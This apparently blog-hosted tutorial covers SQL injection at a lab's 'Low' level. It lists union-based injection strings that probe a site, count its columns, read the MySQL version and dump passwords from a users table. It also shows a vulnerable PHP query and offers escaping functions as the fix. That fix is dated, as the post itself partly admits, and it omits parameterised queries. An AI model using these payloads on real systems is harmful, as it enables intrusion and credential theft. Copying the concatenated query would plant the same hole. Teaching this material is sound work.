SQL Injection

SQL Injection – Low

How it works?


Some Commands

   Tests to see if the server is vulnerable’&action=search

Check how many valid Columns there are.’order by 1,2,3,4,5,6,7– -&action=search

Checks the version of the MySql Database’union+select+1,@@version,3,4,5,6,7–+-&action=search

Retrieves the password from the user table’union+select+1,(SELECT+GROUP_CONCAT(password+SEPARATOR+0x3c62723e)+FROM+users),3,4,5,6,7–+-&action=search

A Useful Tool

A useful tool for Website hacking is HackBar

It only works for Firefox.


unrestricted file-upload high.jpg

Vulnerable Code

$var = $_POST[‘var’];
mysql_query(“SELECT * FROM sometable WHERE id = $var”);

How to deal with it.

$var = mysql_real_escape_string($_POST[‘var’]);

Do not concatenate strings it’s very bad.

PHP comes with many built-in functions, such as addslashesmysql_escape_string and mysql_real_escape_string

Some of these functions have flaws and will be obsolete.

Demonstration Of The Attack

If you have any questions please comment below.

Leave a Reply

%d bloggers like this: